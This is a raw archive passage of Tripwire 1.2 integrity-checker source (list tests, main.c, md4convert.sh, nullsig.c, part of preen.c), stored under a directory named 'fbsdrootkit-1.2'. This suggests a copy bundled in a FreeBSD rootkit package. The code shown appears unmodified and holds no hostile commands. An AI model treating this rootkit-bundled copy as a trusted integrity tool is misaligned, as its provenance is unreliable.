(%s)\n", s); } } fseek(fpin, 0, 0); while (fgets(s, 1024, fpin) != 0) { s[strlen(s)-1] = 0; if (!list_lookup(s, &list)) { printf("Yikes! (%s)\n", s); } } for (i=0; ihashtable[i]; p; p=p->cnext) count++; if (count > 10) count = 10; total[count]++; } printf("\n\nlen number\n"); for (i=0; i<=10; i++) printf("%3d %6d\n", i, total[i]); #endif } #endif #ifdef TEST2 main() { struct list *l = NULL; list_set("a", "A", 1, &l); list_set("b", "B", 2, &l); list_set("c", "C", 3, &l); list_set("d", "d", 4, &l); list_set("e", "E", 5, &l); list_print(&l); list_set("d", "D", 5, &l); list_set("c", "c", 2, &l); list_setflag("b", 42, &l); list_print(&l); list_unset("a", &l); list_print(&l); list_unset("b", &l); list_print(&l); list_unset("d", &l); list_print(&l); } #endif /* TEST2 */ #ifdef TEST2 main() { struct list *l = NULL; list_set("a", "", 0, &l); list_set("b", "", 0, &l); list_set("c", "", 0, &l); list_set("d", "", 0, &l); list_set("e", "", 0, &l); list_print(&l); list_unset("a", &l); list_print(&l); list_unset("b", &l); list_print(&l); list_unset("d", &l); list_print(&l); } #endif /* TEST2 */ #ifdef TEST1a #define HSZ 50 list_debug_dump(pl) list *pl; { struct list_elem *ph, *qh; static int table[HSZ]; int i; int count = 0; for (i = 0; i < LIST_HASHSZ; i++) { ph = pl->hashtable[i]; /* skip useless entries */ if (!ph) continue; for (qh = ph; qh; qh = qh->cnext) { int tmp; sscanf(qh->varname, "%d", &tmp); table[tmp] = 1; count++; } } printf("count=%d (expecting %d)\n", count, HSZ); for (i = 0; i < HSZ; i++) { if (!table[i]) printf("we lost bucket %d\n", i); } } main() { static int isset[HSZ]; int i, j; struct list *l = NULL; char name[1024]; char *string = "x"; int numleft; /* set all values */ printf("--> set list\n"); for (i = 0; i < HSZ; i++) { sprintf(name, "%d", i); list_set(name, string, 0, &l); isset[i] = 1; } /* check for fully connected hash table */ printf("checking for connections...\n"); list_debug_dump(l); /* elim one at a time, and check to see that it's gone */ printf("--> eliminating\n"); numleft = HSZ; while (numleft > 0) { int which = rand() % HSZ; if (!isset[which]) continue; sprintf(name, "%d", which); list_set(name, "", 14, &l); list_setflag(name, 1, &l); list_unset(name, &l); isset[which] = 0; numleft--; #if HSZ < 50 /* confirm order */ printf("--> confirming order\n"); list_open(&l); { int pi; for (pi = 0; !isset[pi]; pi++) ; for (i = 0; i < numleft; i++) { struct list_elem *pl; char t[1024]; pl = list_get(&l); sprintf(t, "%d", pi); if (strcmp(t, pl->varname)) { printf("ordering fuck up! pi=%d, list=%s\n", pi, pl->varname); exit(1); } /* find next existing entry */ for (pi++; !isset[pi]; pi++) ; } } list_close(&l); #endif /* skip if we're not close to failure case */ /* if (numleft > 14005) continue; */ for (j = 0; j < HSZ; j++) { sprintf(name, "%d", j); if (!isset[j]) { if(list_isthere(name, &l)) { printf("fuck up -- list existing: j=%d\n", j); exit(1); } } else { #if HSZ < 3000 if(!list_isthere(name, &l)) { printf("fuck up -- list not existing: j=%d\n", j); exit(1); } #else ; #endif } } if (numleft % 10 == 0) printf("numleft = %d\n", numleft); } printf("** SUCCESS **\n"); exit(0); } #endif fbsdrootkit-1.2/tripwire-1.2/src/main.c100600 764 764 43221 5627323147 15210 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: main.c,v 1.31 1994/08/26 08:23:03 gkim Exp $"; #endif /************************************************************************ * * All files in the distribution of Tripwire are Copyright 1992, 1993 by * the Purdue Research Foundation of Purdue University. All rights * reserved. Some individual files in this distribution may be covered * by other copyrights, as noted in their embedded comments. * * Redistribution and use in source and binary forms are permitted * provided that this entire copyright notice is duplicated in all such * copies, and that any documentation, announcements, and other * materials related to such distribution and use acknowledge that the * software was developed at Purdue University, W. Lafayette, IN by * Gene Kim and Eugene Spafford. No charge, other than an "at-cost" * distribution fee, may be charged for copies, derivations, or * distributions of this material without the express written consent * of the copyright holder. Neither the name of the University nor the * names of the authors may be used to endorse or promote products * derived from this material without specific prior written * permission. THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE * IMPLIED WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR ANY PARTICULAR * PURPOSE. * ************************************************************************/ /* * main.c * * main routines and global variables * * Gene Kim * Purdue University */ #include "../include/config.h" #include #ifdef STDLIBH #include #include #endif #include #include #include #include #ifdef STRINGH #include #else #include #endif #ifdef MALLOCH # include #endif #include #if (defined(SYSV) && (SYSV < 3)) # include #endif /* SVR2 */ #include "../include/list.h" #include "../include/tripwire.h" #include "../include/patchlevel.h" #ifndef L_tmpnam # define L_tmpnam (unsigned int) MAXPATHLEN #endif /* version information */ char *version_num = VERSION_NUM; int db_version_num = DB_VERSION_NUM; /******* signature functions ***************************************** * sig_md5_get : MD5 by RSA * sig_snefru_get : Snefru by Xerox * sig_null_get : null *********************************************************************/ int (*pf_signatures [NUM_SIGS]) () = { SIG0FUNC, SIG1FUNC, SIG2FUNC, SIG3FUNC, SIG4FUNC, SIG5FUNC, SIG6FUNC, SIG7FUNC, SIG8FUNC, SIG9FUNC }; char *signames[NUM_SIGS] = { SIG0NAME, SIG1NAME, SIG2NAME, SIG3NAME, SIG4NAME, SIG5NAME, SIG6NAME, SIG7NAME, SIG8NAME, SIG9NAME }; char *config_file = CONFIG_FILE; char *database_file = DATABASE_FILE; char *database_path = DATABASE_PATH; char *config_path = CONFIG_PATH; char tempdatabase_file[MAXPATHLEN+256]; FILE *fptempdbase; char *defaultignore = DEFAULTIGNORE; static char *defaultignore_parsed; char *db_record_format = DB_RECORD_FORMAT; struct list *olddbase_list = (struct list *) NULL; int debuglevel = 1; int verbosity = 0; int loosedir = 0; static int dbaseinit = 0; int printhex = 0; static char **pp_updateentries = NULL; static int numupdateentries = 0; int quietmode = 0; int printpreprocess = 0; char *specified_dbasefile = NULL; char *specified_configfile = NULL; int specified_configfd = -1; int specified_dbasefd = -1; /* if these vars are non-zero, specified_fd is guaranteed to be valid */ int specified_dbasemode = 0; int specified_configmode = 0; int runtimeignore = 0; int interactivemode = 0; int test_interactive = 0; char *progname; void cleanup(); static void usage() { fputs("usage: tripwire [ options ... ]\n", stderr); fputs("\tWhere `options' are:\n", stderr); fputs("\t\t-initialize Database Generation mode\n", stderr); fputs("\t\t-init \n", stderr); fputs("\t\t-update entry update entry (a file, directory, or \n", stderr); fputs("\t\t tw.config entry) in the database\n", stderr); fputs("\t\t-interactive Integrity Checking mode with\n", stderr); fputs("\t\t Interactive entry updating\n", stderr); fputs("\t\t-loosedir use looser checking rules for directories\n", stderr); fputs("\t\t-d dbasefile read in database from dbasefile\n", stderr); fputs("\t\t (use `-d -' to read from stdin)\n", stderr); fputs("\t\t-c configfile read in config file from configfile\n", stderr); fputs("\t\t (use `-c -' to read from stdin)\n", stderr); fputs("\t\t-cfd fd read in config file from specified fd\n", stderr); fputs("\t\t-dfd fd read in the database file from specified fd\n", stderr); fputs("\t\t-Dvar=value define a tw.config variable (ala @@define)\n", stderr); fputs("\t\t-Uvar undefine a tw.config variable (ala @@undef)\n", stderr); fputs("\t\t-i #|all ignore the specified signature (to reduce\n", stderr); fputs("\t\t execution time)\n", stderr); fputs("\t\t-q quiet mode\n", stderr); fputs("\t\t-v verbose mode\n", stderr); fputs("\t\t-preprocess print out preprocessed configuration file\n", stderr); fputs("\t\t-E \n", stderr); fputs("\t\t-help print out interpretation help message\n", stderr); fputs("\t\t-version print version and patch information\n", stderr); exit(1); } /* * void * version() * * print out version information, with patchlevel information. * currently, there is no real correlation between the two. */ static void version() { fprintf(stderr, "\nTripwire version %s (patchlevel %d)\n\n", version_num, PATCHLEVEL); fprintf(stderr, "Copyright (c) 1992, 1993, 1994 Purdue Research Foundation\n"); fprintf(stderr, "\tBy Gene Kim, Eugene Spafford\n\n"); exit(0); } int main(argc, argv) int argc; char *argv[]; { int i, fd; char *pc; char database[MAXPATHLEN+256]; char mask[64]; char *specified_fd; int exitstatus = 0; progname = argv[0]; /* iterate through arguments */ for (i = 1; i < argc; i++) { pc = argv[i]; /* verbose mode */ if (strcmp(pc, "-v") == 0) { verbosity++; continue; } /* quiet mode */ if (strcmp(pc, "-q") == 0) { quietmode++; continue; } /* hex mode */ if (strcmp(pc, "-x") == 0) { printhex++; continue; } /* database generation mode */ if (strcmp(pc, "-initialize") == 0 || strcmp(pc, "-init") == 0 || strcmp(pc, "-initialise") == 0) { dbaseinit++; continue; } /* print preprocessed configuration file */ if ((strcmp(pc, "-preprocess") == 0) || (strcmp(pc, "-E") == 0)) { printpreprocess++; continue; } /* update specific database entry */ if (strcmp(pc, "-update") == 0) { /* check to see that there is an argument */ if ((pc = argv[++i]) == NULL) { usage(); } /* exhaust the argument list */ while (pc) { if (pp_updateentries == NULL) { if ((pp_updateentries = (char **) malloc(sizeof(char *))) == NULL) { die_with_err("main: malloc() failed!\n", NULL); } } else if ((pp_updateentries = (char **) realloc(pp_updateentries, (numupdateentries+1) * sizeof(char *))) == NULL) { die_with_err("main: realloc() failed!\n", NULL); } pp_updateentries[numupdateentries++] = pc; pc = argv[++i]; } continue; } /* specify database file */ if (strcmp(pc, "-d") == 0) { /* check to see that there is an argument */ if ((pc = argv[++i]) == NULL) { usage(); } specified_dbasefile = pc; specified_dbasemode |= SPECIFIED_FILE; continue; } /* specify configuration file */ if (strcmp(pc, "-c") == 0) { /* check to see that there is an argument */ if ((pc = argv[++i]) == NULL) { usage(); } specified_configfile = pc; specified_configmode |= SPECIFIED_FILE; continue; } /* specify configuration file descriptor */ if (strcmp(pc, "-cfd") == 0) { char err[512]; /* check to see that there is an argument */ if ((pc = argv[++i]) == NULL) { usage(); } specified_fd = pc; if (!sscanf(specified_fd, "%d", &specified_configfd)) { usage(); } /* if we try to read stdin, we'll block, so skip read */ if (specified_configfd != 0 && fcntl(specified_configfd, F_GETFL, 0) < 0) { sprintf(err, "tripwire: Couldn't open fd %d! fcntl()", specified_configfd); perror(err); exit(1); } specified_configmode |= SPECIFIED_FD; continue; } /* specify dbase file descriptor */ if (strcmp(pc, "-dfd") == 0) { char err[512]; /* check to see that there is an argument */ if ((pc = argv[++i]) == NULL) { usage(); } specified_fd = pc; if (!sscanf(specified_fd, "%d", &specified_dbasefd)) { usage(); } /* if we try to read stdin, we'll block, so skip read */ if (specified_dbasefd != 0 && fcntl(specified_dbasefd, F_GETFL, 0) < 0) { sprintf(err, "tripwire: Couldn't open fd %d! fcntl()", specified_dbasefd); perror(err); exit(1); } specified_dbasemode |= SPECIFIED_FD; continue; } /* ignore specified signatures */ if (strcmp(pc, "-i") == 0) { int tmpflag; /* check to see if there is an argument */ if ((pc = argv[++i]) == NULL) { usage(); } if (strcmp(pc, "all") == 0) { runtimeignore = IGNORE_0_9; continue; } if ((sscanf(pc, "%d", &tmpflag)) != 1) usage(); runtimeignore |= (IGNORE_0 << tmpflag); continue; } /* ignore specified signatures */ if (strcmp(pc, "-debug") == 0) { /* check to see if there is an argument */ if ((pc = argv[++i]) == NULL) { usage(); } if ((sscanf(pc, "%d", &debuglevel)) != 1) usage(); continue; } /* print out version information */ if (strcmp(pc, "-version") == 0) { version(); } /* loosedir rules */ if (strcmp(pc, "-loosedir") == 0) { loosedir = 1; continue; } /* print out version information */ if (strcmp(pc, "-help") == 0) { tw_help_print(stderr); exit(0); } /* interactive mode */ if (strcmp(pc, "-interactive") == 0) { interactivemode++; continue; } /* define (-Dfoo=bar) */ if (strncmp(pc, "-D", 2) == 0) { char key[512], value[512]; if (!pc[2]) { fputs("tripwire: -D requires an argument!\n", stderr); exit(1); } (void) string_split_ch(pc+2, key, value, '='); tw_mac_define(key, value); continue; } /* undef (-Ufoo) */ if (strncmp(pc, "-U", 2) == 0) { if (!pc[2]) { fputs("tripwire: -U requires an argument!\n", stderr); exit(1); } tw_mac_undef(pc+2); continue; } /* undocumented: test interactive mode */ if (strcmp(pc, "-interactivetest_yesimsure") == 0) { test_interactive = 1; continue; } usage(); } /* argument sanity checking */ /* eliminate aliases of stdin * (our canonical form is using fd 0) */ if (specified_dbasefile && strcmp(specified_dbasefile, "-") == 0) { specified_dbasefd = 0; specified_dbasemode = SPECIFIED_FD; specified_dbasefile = NULL; } if (specified_configfile && strcmp(specified_configfile, "-") == 0) { specified_configfd = 0; specified_configmode = SPECIFIED_FD; specified_configfile = NULL; } /* are two files set to read from stdin? */ if (specified_configfd == 0 && specified_dbasefd == 0) { fprintf(stderr, "%s: specified database and configuration file can't be both be stdin!\n", progname); exit(1); } /* interactive mode and update mode? */ if (interactivemode && pp_updateentries) { fprintf(stderr, "%s: conflicting mode directives! Aborting...\n", progname); exit(1); } /* specified configfile and configfd? */ if ((specified_configmode & SPECIFIED_FILE) && (specified_configmode & SPECIFIED_FD)) { fprintf(stderr, "%s: specified file and file descriptor for configuration file!\n", progname); exit(1); } /* specified dbasefile and dbasefd? */ if ((specified_dbasemode & SPECIFIED_FILE) && (specified_dbasemode & SPECIFIED_FD)) { fprintf(stderr, "%s: specified file and file descriptor for database file!\n", progname); exit(1); } /* specified dbasefile and initialize dbase mode */ if (specified_dbasemode && dbaseinit) { if (!quietmode) { fprintf(stderr, "%s: specifying a database file in database initialization mode \n", progname); fprintf(stderr, "\tis meaningless. Ignoring specified file...\n"); } } /*** we check any specified file descriptors to make sure they are *** files. if not, we copy them into /tmp and return its fd. *** (we unlink them as soon as we create them.) ***/ switch(specified_dbasemode) { case SPECIFIED_NONE: break; case SPECIFIED_FILE: specified_dbasefd = file_copy_to_tmp(specified_dbasefile); break; case SPECIFIED_FD: specified_dbasefd = fd_copy_to_tmp(specified_dbasefd); break; default: die_with_err("illegal specified_dbasemode state", NULL); } switch(specified_configmode) { case SPECIFIED_NONE: break; case SPECIFIED_FILE: specified_configfd = file_copy_to_tmp(specified_configfile); break; case SPECIFIED_FD: specified_configfd = fd_copy_to_tmp(specified_configfd); break; default: die_with_err("illegal specified_configmode state", NULL); } /* initialize lists */ list_init(); /* build hostname specific names */ filename_hostname_expand(&config_path); filename_hostname_expand(&config_file); filename_hostname_expand(&database_path); filename_hostname_expand(&database_file); /* recompute the default ignore string (old -> new format) */ (void) strcpy(mask, defaultignore); ignore_configvec_to_dvec(mask); defaultignore_parsed = mask; /* if we are creating a database, make sure the database troving directory * exist. */ #define DATABASE_REPOSITORY "./databases" if (dbaseinit || interactivemode || numupdateentries > 0) { if ((fd = open(DATABASE_REPOSITORY, 0)) >= 0) { close(fd); } else { if (mkdir(DATABASE_REPOSITORY, 0777) >= 0) { if (!quietmode) { fprintf(stderr, "### Warning:\tcreating %s directory!\n", DATABASE_REPOSITORY); fprintf(stderr, "###\n"); } } else { char errstr[1024]; sprintf(errstr, "%s: mkdir(%s)", progname, DATABASE_REPOSITORY); perror(errstr); exit(1); } } } /* are we in database generation mode? */ if (dbaseinit) { char *oldpath = database_path; char *newpath = database_path = "./databases"; struct list *dbase_entry_list = (struct list *) NULL; /* place database in ./databases */ database_path = newpath; /* generate the database */ configfile_read(&olddbase_list, &dbase_entry_list); database_build(&olddbase_list, DBASE_PERMANENT, &dbase_entry_list); if (!quietmode) { fprintf(stderr, "###\n"); fprintf(stderr, "### Warning: Database file placed in %s/%s.\n", database_path, database_file); fprintf(stderr, "###\n"); fprintf(stderr, "### Make sure to move this file file and the configuration\n"); fprintf(stderr, "### to secure media!\n"); fprintf(stderr, "###\n"); fprintf(stderr, "### (Tripwire expects to find it in '%s'.)\n", oldpath); } cleanup(); exit(0); } /* * make sure that database file is there! * (this is meaningless if we specified stdin "-") */ switch(specified_dbasemode) { case SPECIFIED_NONE: sprintf(database, "%s/%s", database_path, database_file); break; case SPECIFIED_FILE: (void) strcpy(database, specified_dbasefile); break; case SPECIFIED_FD: break; } if (!printpreprocess && (specified_dbasemode != SPECIFIED_FD)) { if ((fd = open(database, O_RDONLY)) < 0) { /* make sure our error message is correct */ if (errno != ENOENT) { char err[1024]; sprintf(err, "%s: database file `%s'", progname, database); perror(err); exit(1); } fprintf(stderr, "%s: database file '%s' does not exist! Aborting...\n", progname, database); exit(1); } (void) close(fd); } /* are we in database update mode? */ if (numupdateentries) { update_mark(pp_updateentries, numupdateentries); cleanup(); exit(0); } /* we're in integrity checking mode */ update_gather(interactivemode, &pp_updateentries); /* do we do the interactive update? */ if (interactivemode && pp_updateentries) { list_reset(&olddbase_list); list_reset(&diff_added_list); list_reset(&diff_deleted_list); list_reset(&diff_changed_list); /* reset the ignore flags so we scan all signatures */ runtimeignore = 0; for (i = 0, pc = pp_updateentries[i]; pc; i++, pc = pp_updateentries[i]) { SPDEBUG(0) printf("Updating entry: %s\n", filename_escape(pc)); } numupdateentries = i; if (!quietmode) { fprintf(stderr, "### Updating database...\n###\n"); } update_mark(pp_updateentries, numupdateentries); cleanup(); if (!quietmode) { fprintf(stderr, "###\n"); fprintf(stderr, "### If you changed the tw.config file, remember to run `twdb_check.pl' to\n"); fprintf(stderr, "### ensure database consistency.\n"); fprintf(stderr, "### See the README file for details.\n"); } exit(0); } cleanup(); /* our exit status is based on files added/deleted/changed */ if (diff_added_num) exitstatus |= 2; if (diff_deleted_num) exitstatus |= 4; if (diff_unignored_num) exitstatus |= 8; exit(exitstatus); /*NOTREACHED*/ } void cleanup() { /* delete temporary database file (derived from specified dbasefd) */ /* if (specified_dbasefd >= 0) { unlink(specified_dbasefile); } */ } fbsdrootkit-1.2/tripwire-1.2/src/md4convert.sh100700 764 764 4326 5367613473 16532 0ustar dfdf#!/bin/sh # md4convert.sh # # md4convert.sh is a shell script replaces all the MD4 signatures in # the specified Tripwire database. This script was written to help # re-adjust the databases after it was discovered that the MD4 routines # included in Tripwire releases before version 1.0.3 generated # incorrect signatures. # # Gene Kim # Purdue University # April 28, 1993 # ## predefined filenames file=/tmp/genek/tw.db_flounder.Eng.Sun.COM ## names of temporary files tmpfile=/tmp/tw.list outfile=/tmp/tw.tmp sigfile=/tmp/tw.sig ## make backup files (very conservatively) # copy the files to the right places if [ -f $file.BAK ] then echo "### $file.BAK already exists! " echo "### Cannot backup file. Remove the file and run this script again." exit 1 fi echo "### Backing up $file to $file.BAK" cp $file $file.BAK ## place {filename, md4sig} pairings in $tmpfile echo "### Scanning new file signatures" rm -f $outfile cat $file | egrep -v '^#' | egrep -v '^@' | awk ' BEGIN { NF = " "; } \ { if ($13 == $14 && $14 == $15 && \ $15 == $16 && $16 == $17 && $17 == $18 && $18 == $19 && \ $19 == $20 && $20 == $21 && $21 == $22 && $22 == 0) { next; } \ else {print $1;}} ' > $tmpfile for filename in `cat $tmpfile` do # this works unreliably, so we have to look for all nullsigs up above if [ -f $filename ] then sigfetch -5 $filename > $sigfile if [ $? -eq 0 ] then sig=`cat $sigfile | sed 's/.*: //'` echo Scanning: $filename echo $filename $sig >> $outfile fi fi done ## merge the two files together echo "### Substituting and merging signature files..." newfile=/tmp/tw.new awk ' \ # signatures begin at field 12 \ BEGIN { \ FS = " "; \ filename = "/tmp/tw.tmp"; \ \ # get new values from tmpfile, put into associative array \ while(getline newline " newarray[2]; \ signatures[newarray[1]] = newarray[2]; \ } \ \ } \ /^#/ { print $0; next; } \ /^@@/ { print $0; next; } \ { \ if (signatures[1]) { \ print "-->", signatures[$1], "<---"; $17 = signatures[$1]; \ } \ print $0; \ \ } ' < $file > $newfile echo "### Copying new database file to $file" cp $newfile $file fbsdrootkit-1.2/tripwire-1.2/src/nullsig.c100600 764 764 2171 5612134343 15710 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: nullsig.c,v 1.12 1994/07/17 04:51:47 gkim Exp $"; #endif /* * nullsig.c * * hook for null signature * * Gene Kim * Purdue University */ #include "../include/config.h" #include #ifdef STDLIBH #include #include #endif #if !defined(SYSV) || (SYSV > 3) # include #else # include #endif /* SYSV */ #include #include #include "../include/tripwire.h" #include "../include/sigs.h" #ifndef SEEK_SET # define SEEK_SET L_SET #endif /* * int * pf_signature(int fd_in, char *ps_signature, int siglen) * * fd_in: pointer to input file descriptor * ps_signature: pointer to array where signature will be stored * siglen: length of the signature array (for overflow checking) */ int sig_null_get (fd_in, ps_signature, siglen) int fd_in; char *ps_signature; int siglen; { /* rewind the file descriptor */ if (lseek(fd_in, 0, SEEK_SET) < 0) { die_with_err("sig_null_get: lseek()", (char *) NULL); } /* lint pacifier */ siglen += 0; sprintf(ps_signature, "0"); return 0; } fbsdrootkit-1.2/tripwire-1.2/src/preen.c100600 764 764 45735 5614754433 15413 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: preen.c,v 1.29 1994/07/25 15:24:11 gkim Exp $"; #endif /* * preen.c * * preen the filesystems in preen.config against the data stored in * in preen.database. * * Gene Kim * Purdue University */ #include "../include/config.h" #include #ifdef STDLIBH #include #include #endif #include #ifdef STRINGH #include #else #include #endif #include #include #if (defined(SYSV) && (SYSV < 3)) # include #endif /* SVR2 */ #include #include "../include/list.h" #include "../include/tripwire.h" static struct list *newdbase_list = NULL; static int numentriesread = 0; /* running count of @@contents */ /* prototypes */ char *mktemp(); static void olddbasefile_load(); char *updatemodes[] = { "invalid update", "add file", "delete file", "update file", "entry not found", "add entry", "delete entry", "update entry", }; /* * update_gather() * * routine that calls all the other functions for preening * in interactive mode. (this is a wrapper around the functions * of integrity checking mode and then update.) */ void update_gather(interactive, ppp_updateentries) int interactive; char ***ppp_updateentries; { FILE *fp_in; struct list *configentry_list = (struct list *) NULL; SPDEBUG(3) printf("*** entering update_gather()\n"); /* build the filelist (newdbase_list) from the preen.config file * it will create the linked list of files */ configfile_read(&newdbase_list, &configentry_list); /* if we're simply using as a preprocessor, then quit */ if (printpreprocess) exit(0); /* preen ourselves: * build a temporary database, then check for diffs */ database_build(&newdbase_list, DBASE_TEMPORARY, &configentry_list); /* read in the old database */ olddbasefile_load(&configentry_list); assert(configentry_list); /* database_build() rewound the descriptor, so it's ready to use */ fp_in = fptempdbase; /* build the diff_xxx_lists of ADDED, CHANGED, DELETED */ preen_interp(fp_in); /* now build the report */ preen_report(interactive, ppp_updateentries); if (!specified_configmode) (void) fclose(fp_in); /* remove the temporary database file */ (void) unlink(tempdatabase_file); SPDEBUG(3) printf("*** leaving update_gather()\n"); list_reset(&configentry_list); return; } /* * update_mark(char **ppentries, int numentries) * * build the filelist (newdbase_list) from tw.config file. * check if each (updateentry) in the (ppentries) vector is an entry * if it is, update all entries with the same entrynum * else if (updateentry) exists * if so, update, w/same entrynum * else append to database, w/entrynum = -1 */ void update_mark(ppentries, numentries) char **ppentries; int numentries; { struct list *configentry_list = (struct list *) NULL; char *entry; int i, numskipped = 0; /* number of entries not found */ /* build the filelist (newdbase_list) from the tw.config file * it will create the linked list of files */ list_reset(&newdbase_list); list_reset(&configentry_list); assert(!newdbase_list); assert(!configentry_list); assert(!olddbase_list); configfile_read(&newdbase_list, &configentry_list); /* read in the old database */ olddbasefile_load(&configentry_list); SPDEBUG(20) { printf("===== configentry_list ===\n"); list_print(&configentry_list); printf("===== newdbase_list ===\n"); list_print(&newdbase_list); printf("===== olddbase_list ===\n"); list_print(&olddbase_list); } /* iterate through the entries */ for (i = 0; i < numentries; i++) { int isentry, isold, isnew; int whichcase; entry = ppentries[i]; /* check to see if filename is fully-qualified! */ if (entry[0] != '/') { fprintf(stderr, "%s: file '%s' is not fully qualified! Skipping...\n", progname, entry); numskipped++; continue; } /* * tw.config old dbase new dbase * ========= ======== ======== * 0. - - - * 1. - - y * 2. - y - * 3. - y y * 4. y - - * 5. y - y * 6. y y - * 7. y y y * * * (0) xxx -- can't happen * skip, invalid filename * * (1) add file -- adds the single file to the database * (what contents number do we give it? what ignore flags?) * * (2) delete file -- removes the single file from the database. * * (3) update file -- updates the single file in the database. * (inherit new ignore mask) * * (4) xxx -- the entry doesn't resolve to any files on the system. * (no change) * * (5) add entry -- recurses down the specified entry and adds all * the resulting files to the database. * (ignore mask comes from "closest" tw.config entry) * * (6) delete entry -- the files disappeared since the last * dbase snapshot so, delete the entire entry * * (7) update entry -- recurses down the specified entry and * updates all those entries in the database * (inherit new ignore mask) */ isentry = list_isthere(entry, &configentry_list); isnew = list_isthere(entry, &newdbase_list); isold = list_isthere(entry, &olddbase_list); /* our case number is the vector of true/false bits */ whichcase = (isentry << 2) | (isold << 1) | (isnew); if (!quietmode) { fprintf(stderr, "Updating: %s: %s\n", updatemodes[whichcase], filename_escape(entry)); } switch(whichcase) { case UPDATE_INVALID: case UPDATE_NOTFOUND: if (!quietmode) { fprintf(stderr, "update: %s: invalid entry! skipping...\n", entry); } continue; case UPDATE_ADDFILE: { char entry_ignorevec[64]; char ignorestring[64]; char *pc; int entrynum; char entryname[1024]; if (verbosity) fprintf(stderr, "Adding file %s\n", filename_escape(entry)); dbase_entry_howclose(entry, &configentry_list, entryname, &entrynum); /* we use the default ignore-string. XXX. Must be definable */ if (!(pc = list_lookup(entry, &newdbase_list))) { strcpy(ignorestring, defaultignore); ignore_configvec_to_dvec(ignorestring); } else { char tmpignore[64]; int j, err; if ((err = sscanf(pc, "%d %s", &j, tmpignore)) != 2) { fprintf(stderr, "update_mark: newdbase_list parse error (nfields=%d, %s:%d)!\n", err, __FILE__, __LINE__); fprintf(stderr, "%s>> %s\n", entry, pc); exit(1); } strcpy(ignorestring, tmpignore); } sprintf(entry_ignorevec, "%d %s", entrynum, ignorestring); list_set(entry, entry_ignorevec, MAXPATHLEN+1, &olddbase_list); list_setflag(entry, FLAG_UPDATE, &olddbase_list); } break; case UPDATE_DELETEFILE: if (verbosity) fprintf(stderr, "Deleting file %s\n", filename_escape(entry)); list_unset(entry, &olddbase_list); break; case UPDATE_UPDATEFILE: { char oldignore[64], newignore[64], *pc, oldrest[1024]; char newvalue[1024]; int err, newentry, oldentry; if (verbosity) fprintf(stderr, "Updating file %s\n", filename_escape(entry)); /* we know that the entry exists the the new dbaselist, otherwise, * we couldn't be in this case! */ pc = list_lookup(entry, &newdbase_list); assert(pc != NULL); /* parse the new dbase entry */ if ((err = sscanf(pc, "%d %s", &newentry, newignore)) != 2) { fprintf(stderr, "update_mark: newdbase_list parse error (nfields=%d, %s:%d)!\n", err, __FILE__, __LINE__); fprintf(stderr, "%s>> %s\n", entry, pc); exit(1); } /* parse the old dbase entry */ pc = list_lookup(entry, &olddbase_list); assert(pc != NULL); /* parse the old dbase entry */ if ((err = sscanf(pc, "%d %s %[^\n]", &oldentry, oldignore, oldrest)) != 3) { if (list_getflag(entry, &olddbase_list) & FLAG_UPDATE) { SPDEBUG(3) printf("\t(it's already a newly file...)\n"); break; } fprintf(stderr, "update_mark: olddbase_list parse error (nfields=%d, %s:%d)!\n", err, __FILE__, __LINE__); fprintf(stderr, "%s>> %s\n", entry, pc); exit(1); } /* splice the new ignore flag into the old dbase list */ sprintf(newvalue, "%d %s %s\n", oldentry, newignore, oldrest); /* check to make sure we're not overflowing bounds */ /* why? the ignore mask is the only thing that changed, * so the length of the entire string should also remain * unchanged. */ assert(strlen(newvalue) == strlen(pc)); list_set(entry, newvalue, MAXPATHLEN+1, &olddbase_list); list_setflag(entry, FLAG_UPDATE, &olddbase_list); } break; case UPDATE_ADDENTRY: { struct list_elem *p; char ignorevec[128]; int number; char *pc; int err; if (verbosity) fprintf(stderr, "Adding entry %s\n", filename_escape(entry)); if (!(pc = list_lookup(entry, &configentry_list))) { fprintf(stderr, "%s: Can't find entry '%s'. Skipping...\n", progname, entry); continue; } if ((err = sscanf(pc, "%d %s", &number, ignorevec)) != 2) { fprintf(stderr, "update_mark: configentry_list parse error (nfields=%d, %s:%d)!\n", err, __FILE__, __LINE__); fprintf(stderr, "%s>> %s\n", entry, pc); exit(1); } list_open(&newdbase_list); while ((p = list_get(&newdbase_list))) { int thisentry; if (sscanf(p->varvalue, "%d", &thisentry) != 1) { fprintf(stderr, "update_mark: newdbase_list parse error (nfields=%d, %s:%d)!\n", err, __FILE__, __LINE__); fprintf(stderr, "%s>> %s\n", p->varname, p->varvalue); exit(1); } /* does it match the entry we're adding? */ if (thisentry == number) { SPDEBUG(6) { printf("--(adding entry)--> %s\n", p->varname); } list_set(p->varname, p->varvalue, MAXPATHLEN+1, &olddbase_list); list_setflag(p->varname, FLAG_UPDATE, &olddbase_list); } } list_close(&olddbase_list); } break; case UPDATE_DELETEENTRY: case UPDATE_UPDATEENTRY: if (verbosity) { switch(whichcase) { case UPDATE_DELETEENTRY: fprintf(stderr, "Deleting entry %s\n", filename_escape(entry)); break; case UPDATE_UPDATEENTRY: fprintf(stderr, "Updating entry %s\n", filename_escape(entry)); break; } } { struct list_elem *p, *q = (struct list_elem *) NULL; char s[2048]; int entrynum; char newignore[1024]; int err; /* get entry number and new ignore mask */ (void) strcpy(s, list_lookup(entry, &configentry_list)); if ((err = sscanf(s, "%d %s", &entrynum, newignore)) != 2) { fprintf(stderr, "update_mark: configentry_list parse error (nfields=%d, %s:%d)!\n", err, __FILE__, __LINE__); fprintf(stderr, "%s>> %s\n", entry, s); exit(1); } /* we're updating entries */ if (whichcase == UPDATE_UPDATEENTRY) { dbase_entry_flag(&olddbase_list, entrynum, FLAG_UPDATE, (char *) newignore); } /* else we're deleting entries */ else { dbase_entry_flag(&olddbase_list, entrynum, FLAG_DELETE, NULL); SPDEBUG(20) list_print(&olddbase_list); list_open(&olddbase_list); while ((p = list_get(&olddbase_list))) { if (q) { list_unset(q->varname, &olddbase_list); q = (struct list_elem *) NULL; } if (list_getflag(p->varname, &olddbase_list) & FLAG_DELETE) { q = p; } } if (q) { list_unset(q->varname, &olddbase_list); q = (struct list_elem *) NULL; } list_close(&olddbase_list); list_unset(entry, &configentry_list); SPDEBUG(20) { list_print(&configentry_list); } } } break; default: fprintf(stderr, "update_mark: invalid case %d!\n", whichcase); exit(1); } } /* did we skip all the files, thus a no-op? */ if 